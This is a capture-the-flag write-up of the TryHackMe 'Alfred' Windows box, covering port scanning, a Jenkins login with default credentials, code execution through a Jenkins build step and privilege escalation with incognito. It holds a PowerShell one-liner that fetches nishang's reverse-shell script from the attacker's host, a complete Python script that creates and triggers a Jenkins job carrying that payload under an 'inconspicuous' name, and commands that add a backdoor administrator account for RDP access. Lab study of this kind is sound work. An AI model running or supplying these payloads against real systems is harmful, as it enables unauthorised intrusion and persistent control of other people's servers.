#tryhackme #windows #easy

![[Pasted image 20250710202706.png]]

---

# Information Gathering - Nmap

As always, I began with nmap to scan all TCP ports.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ sudo nmap -sS $IP -Pn --open --min-rate 3000 -p-
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:41 CDT
Nmap scan report for 10.10.212.94
Host is up (0.14s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit

PORT     STATE SERVICE
80/tcp   open  http
3389/tcp open  ms-wbt-server
8080/tcp open  http-proxy

Nmap done: 1 IP address (1 host up) scanned in 44.64 seconds
```

Then I ran a more detailed scan (default scripts plus version detection) against the three open ports: 80, 3389, and 8080. Note that in this run all three came back `filtered`, so no banners or versions were collected; this was most likely the VPN instability mentioned later, and the services were identified from the browser instead.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sCV -Pn $IP -p 80,3389,8080
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT
Nmap scan report for 10.10.212.94
Host is up.

PORT     STATE    SERVICE       VERSION
80/tcp   filtered http
3389/tcp filtered ms-wbt-server
8080/tcp filtered http-proxy

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.35 seconds
```

Lastly, a UDP scan against the top 10 ports. Everything is `open|filtered`, which for UDP only means that no response came back at all, so this scan tells us nothing usable here.

```bash
┌──(parallels㉿kali-linux-2024-2)-[~/Desktop]
└─$ nmap -sU $IP --top-ports 10 -Pn
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-09 21:44 CDT
Nmap scan report for 10.10.212.94
Host is up.

PORT     STATE         SERVICE
53/udp   open|filtered domain
67/udp   open|filtered dhcps
123/udp  open|filtered ntp
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m

Nmap done: 1 IP address (1 host up) scanned in 3.17 seconds
```

# Footprinting

##### Port 80

This is the landing page. The page source didn't reveal anything interesting.
![[Pasted image 20250709214553.png]]

##### Port 8080

The landing page is a login form, and the branding makes it clear that Jenkins is running here.

![[Pasted image 20250709215449.png]]

# Exploit - Initial Access

In the login form I tried the default credentials `admin:admin` and they logged me in. Now let's look for a way to turn Jenkins access into code execution on the host.

![[Pasted image 20250709215914.png]]

Jenkins has a feature that lets us execute commands on the underlying system: a build step in a job. Whatever we put in that step runs on the node the job is built on, under the account the Jenkins service runs as, so the shell we get will have that account's privileges. To get there, go to `project`.

![[Pasted image 20250709234030.png]]

Now navigate to `Configure`.

![[Pasted image 20250709234230.png]]

In the `Build` section there is a text box where we can insert Windows commands to be executed. For our purposes I'm going to use the following payload to get a reverse shell, where `<IP>` is my Kali VPN address (the one the target can reach) and `<PORT>` is the listener port:

```powershell
powershell iex (New-Object Net.WebClient).DownloadString('http://<IP>:<PORT>/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP> -Port <PORT>
```

![[Pasted image 20250709234908.png]]

In order to use the payload above, I first need to download `nishang`'s `Invoke-PowerShellTcp.ps1` reverse shell script from [here](https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1).

The upper pane is the HTTP server on my local Kali from which the Jenkins host downloads `Invoke-PowerShellTcp.ps1`. The bottom pane is the listener waiting for the reverse shell connection.

![[Pasted image 20250710000041.png]]

Insert the payload, then select `Apply` and `Save` at the bottom.

![[Pasted image 20250710000236.png]]

Jenkins then redirects us to the `Project` page; select `Build Now` to run the build with our new step.

![[Pasted image 20250710000342.png]]

Under `Build History` you can see the newly created build being prepared.

![[Pasted image 20250710000622.png]]

Back in the terminal, we can see that we got the reverse shell!
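The `Configure` -> `Apply`/`Save` -> `Build Now` sequence above can also be scripted, which is handy when the UI is slow or the VPN keeps dropping. The script below is an added example and is not part of the original writeup or of Jenkins itself. It talks to Jenkins' standard REST endpoints (`/crumbIssuer/api/json` for the CSRF crumb, `/createItem` with a freestyle `config.xml`, `/job/<name>/build`, and `/job/<name>/lastBuild/consoleText`), uses the `hudson.tasks.BatchFile` builder that the "Execute Windows batch command" step is stored as, and plugs the same nishang one-liner into it. The job name `maintenance` is an assumption; target URL, credentials, listener IP and port are taken from the command line.

```python
"""Create a Jenkins freestyle job with one "Execute Windows batch command"
step, trigger it, and print the console log. Added example, not from the
original writeup; assumes HTTP access and a user allowed to create jobs."""
import base64
import http.cookiejar
import json
import sys
import time
import urllib.error
import urllib.parse
import urllib.request
from xml.sax.saxutils import escape


def stager_command(lhost, lport):
    """The nishang one-liner from the writeup with the listener filled in."""
    return ("powershell iex (New-Object Net.WebClient).DownloadString("
            f"'http://{lhost}:{lport}/Invoke-PowerShellTcp.ps1');"
            f"Invoke-PowerShellTcp -Reverse -IPAddress {lhost} -Port {lport}")


def job_config_xml(command):
    """config.xml for a freestyle project whose only builder is
    hudson.tasks.BatchFile (the "Execute Windows batch command" step).
    The command is XML-escaped: shell one-liners routinely contain <, > and &."""
    return ("<?xml version='1.1' encoding='UTF-8'?>\n"
            "<project>\n"
            "  <keepDependencies>false</keepDependencies>\n"
            "  <canRoam>true</canRoam>\n"
            "  <disabled>false</disabled>\n"
            "  <builders>\n"
            "    <hudson.tasks.BatchFile>\n"
            f"      <command>{escape(command)}</command>\n"
            "    </hudson.tasks.BatchFile>\n"
            "  </builders>\n"
            "</project>\n")


class Jenkins:
    def __init__(self, base, user, password):
        self.base = base.rstrip("/")
        # The cookie jar matters: current Jenkins ties the CSRF crumb to the session.
        jar = http.cookiejar.CookieJar()
        self.opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(jar))
        token = base64.b64encode(f"{user}:{password}".encode()).decode()
        self.headers = {"Authorization": f"Basic {token}"}
        try:
            crumb = json.loads(self._request("/crumbIssuer/api/json").read())
            self.headers[crumb["crumbRequestField"]] = crumb["crumb"]
        except urllib.error.HTTPError as e:
            if e.code != 404:      # 404 means CSRF protection is off; anything else is real
                raise

    def _request(self, path, data=None, content_type=None):
        req = urllib.request.Request(self.base + path, data=data, headers=self.headers)
        if content_type:
            req.add_header("Content-Type", content_type)
        return self.opener.open(req, timeout=30)   # data is not None => POST

    def create_job(self, name, config_xml):
        self._request("/createItem?" + urllib.parse.urlencode({"name": name}),
                      data=config_xml.encode(), content_type="application/xml")

    def build(self, name):
        self._request(f"/job/{urllib.parse.quote(name)}/build", data=b"")

    def console(self, name):
        resp = self._request(f"/job/{urllib.parse.quote(name)}/lastBuild/consoleText")
        return resp.read().decode(errors="replace")


def main(argv):
    if len(argv) != 5:
        print(f"usage: {argv[0]} http://TARGET:8080 USER:PASS LHOST LPORT")
        return 2
    base, creds, lhost, lport = argv[1:]
    user, password = creds.split(":", 1)
    jenkins = Jenkins(base, user, password)
    name = "maintenance"            # assumed job name; pick something inconspicuous
    jenkins.create_job(name, job_config_xml(stager_command(lhost, int(lport))))
    jenkins.build(name)             # same as clicking "Build Now"
    for _ in range(30):             # lastBuild 404s until the build leaves the queue
        try:
            print(jenkins.console(name))
            return 0
        except urllib.error.HTTPError as e:
            if e.code != 404:
                raise
            time.sleep(2)
    return 1


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

Start the HTTP server and the listener first, then run it as `python3 jenkins_batch.py http://<TARGET>:8080 admin:admin <IP> <PORT>`. The build stays "in progress" for as long as the reverse shell is alive, and the job itself remains on the server until you delete it (a POST to `/job/<name>/doDelete`), so clean up when you are done.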
![[Pasted image 20250710000650.png]]

The shell runs as `bruce`, the account the Jenkins service runs under, and the `user.txt` flag is on that user's desktop:

```powershell
PS C:\Users\bruce\Desktop> dir

    Directory: C:\Users\bruce\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a---        10/25/2019  11:22 PM             32 user.txt

PS C:\Users\bruce\Desktop> type user.txt
790...
```

# Privilege Escalation

The `whoami /priv` command lists the privileges held by the current token and whether each one is currently enabled or disabled. We can see that `SeDebugPrivilege`, `SeChangeNotifyPrivilege`, `SeImpersonatePrivilege`, and `SeCreateGlobalPrivilege` are enabled for bruce.

![[Pasted image 20250710002017.png]]

**For some reason my TryHackMe OpenVPN connection kept disconnecting, to the point where I couldn't progress any further. Therefore, I am starting over with TryHackMe's built-in VM. You can notice the different UI in the screenshots.**

The target therefore has a new address, `10.10.41.223`, in the commands that follow.

`SeImpersonatePrivilege` ("Impersonate a client after authentication") lets a process impersonate any access token it can obtain a handle to, including those of privileged accounts such as `SYSTEM`: the process then acts as that user, using that user's security token. Service accounts commonly hold this privilege, which is why it is one of the first things to check after landing in a service context. I am going to use the `incognito.exe` tool to take advantage of this and escalate privileges. I am using the standalone version, not the `meterpreter` one. I transferred `incognito.exe` from my local environment to the remote Windows system.

![[Pasted image 20250710195427.png]]

`./incognito.exe list_tokens -u` enumerates the tokens incognito can reach. Under the `Delegation Tokens Available` section `NT AUTHORITY\SYSTEM` is listed, meaning a SYSTEM token is available for us to impersonate. `SYSTEM` is the highest privilege on Windows.

```powershell
PS C:\Temp> ./incognito.exe list_tokens -u
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found

Delegation Tokens Available
============================================
alfred\bruce
IIS APPPOOL\DefaultAppPool
NT AUTHORITY\IUSR
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
============================================
NT AUTHORITY\ANONYMOUS LOGON

Administrative Privileges Available
============================================
SeAssignPrimaryTokenPrivilege
SeCreateTokenPrivilege
SeTcbPrivilege
SeTakeOwnershipPrivilege
SeBackupPrivilege
SeRestorePrivilege
SeDebugPrivilege
SeImpersonatePrivilege
SeRelabelPrivilege
SeLoadDriverPrivilege
```

Remember, we found port `3389` open running RDP. Using the SYSTEM token, we can create a user, add it to the local Administrators group, and connect over RDP with it.

```powershell
PS C:\Temp> ./incognito.exe add_user wook wook413
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user wook to host 127.0.0.1
[+] Successfully added user

PS C:\Temp> ./incognito.exe add_localgroup_user Administrators wook
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user wook to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
```

Be aware that this is a loud way to use the token: creating a local account and adding it to Administrators writes events 4720 (user account created) and 4732 (member added to a security-enabled local group) to the Security log, and the account persists until someone removes it. It is fine for a lab box, but on a real engagement you would remove the account during cleanup.

After creating the user and adding it to the Administrators group, run `xfreerdp` to connect to the server with the credentials we just created, in our case `wook:wook413`.

```bash
xfreerdp /v:10.10.41.223 /u:wook /p:wook413 /dynamic-resolution
```

`whoami` returns `alfred\wook`, and the `net localgroup` command confirms that we are part of the `Administrators` group, as expected.

![[Pasted image 20250710201903.png]]

Found the `root.txt` flag!

![[Pasted image 20250710202638.png]]
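The two outputs that drove the privilege escalation above, `whoami /priv` and incognito's `list_tokens -u`, are worth triaging systematically rather than by eye, because the interesting privilege is easy to miss in a long list and `Disabled` does not mean "not held". The parser below is an added example, not part of the writeup or of either tool. Its sample inputs are constructed to match the formats seen on this box (they are not captures from it), and the privilege-to-technique mapping is general Windows knowledge, not something specific to Alfred.

```python
"""Triage `whoami /priv` and incognito `list_tokens -u` output for
privilege-escalation paths. Added example; sample data is constructed."""
import sys

# Privileges that on their own give a route to SYSTEM or equivalent.
ESCALATION_PRIVS = {
    "SeImpersonatePrivilege": "impersonate any token you can obtain (incognito, potato family)",
    "SeAssignPrimaryTokenPrivilege": "start a process with a stolen primary token",
    "SeDebugPrivilege": "open any process, e.g. dump LSASS or inject into a SYSTEM process",
    "SeBackupPrivilege": "read any file regardless of ACL (SAM and SYSTEM hives)",
    "SeRestorePrivilege": "write any file regardless of ACL (service binaries)",
    "SeTakeOwnershipPrivilege": "take ownership of any securable object",
    "SeLoadDriverPrivilege": "load a kernel driver",
    "SeTcbPrivilege": "act as part of the operating system",
    "SeCreateTokenPrivilege": "forge arbitrary tokens",
}
SYSTEM = r"NT AUTHORITY\SYSTEM"

# Constructed sample modelled on `whoami /priv` from the bruce shell.
WHOAMI_SAMPLE = """\
PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State
============================= ========================================= ========
SeDebugPrivilege              Debug programs                            Enabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege       Create global objects                     Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
"""

# Constructed sample modelled on `incognito.exe list_tokens -u`.
INCOGNITO_SAMPLE = r"""[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found

Delegation Tokens Available
============================================
alfred\bruce
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM

Impersonation Tokens Available
============================================
NT AUTHORITY\ANONYMOUS LOGON
"""


def parse_whoami_priv(text):
    """Map privilege name -> True if Enabled, False if Disabled.
    Data rows start with 'Se...' and end with the State column."""
    privs = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) >= 3 and parts[0].startswith("Se") and parts[-1] in ("Enabled", "Disabled"):
            privs[parts[0]] = parts[-1] == "Enabled"
    return privs


def parse_incognito_tokens(text):
    """Map each '... Available' heading -> the entries listed under it."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(("[", "=")):   # status lines and rulers
            continue
        if line.endswith("Available"):
            current = line
            sections[current] = []
        elif current is not None:
            sections[current].append(line)
    return sections


def triage(whoami_output, incognito_output):
    """Return (subject, note) findings worth acting on."""
    privs = parse_whoami_priv(whoami_output)
    tokens = parse_incognito_tokens(incognito_output)
    findings = []
    for name, note in ESCALATION_PRIVS.items():
        if name in privs:
            # "Disabled" only means not currently enabled in the token; a process
            # holding the privilege can turn it on with AdjustTokenPrivileges.
            state = "enabled" if privs[name] else "disabled but can be enabled"
            findings.append((name, f"{state}: {note}"))
    # Impersonation is only useful if there is a token worth taking.
    if "SeImpersonatePrivilege" in privs and SYSTEM in tokens.get("Delegation Tokens Available", []):
        findings.append((SYSTEM, "SYSTEM delegation token reachable: incognito can impersonate it"))
    return findings


if __name__ == "__main__":
    # Usage: triage.py whoami_priv.txt incognito.txt (defaults to the samples)
    if len(sys.argv) == 3:
        whoami_text, incog_text = (open(p, encoding="utf-8", errors="replace").read() for p in sys.argv[1:])
    else:
        whoami_text, incog_text = WHOAMI_SAMPLE, INCOGNITO_SAMPLE
    for subject, note in triage(whoami_text, incog_text):
        print(f"{subject:<32} {note}")
```

Run without arguments it triages the constructed samples; with two file arguments it reads saved `whoami /priv` and incognito output. On this box it flags `SeDebugPrivilege` and `SeImpersonatePrivilege`, and reports the reachable SYSTEM delegation token, which is exactly the path taken above.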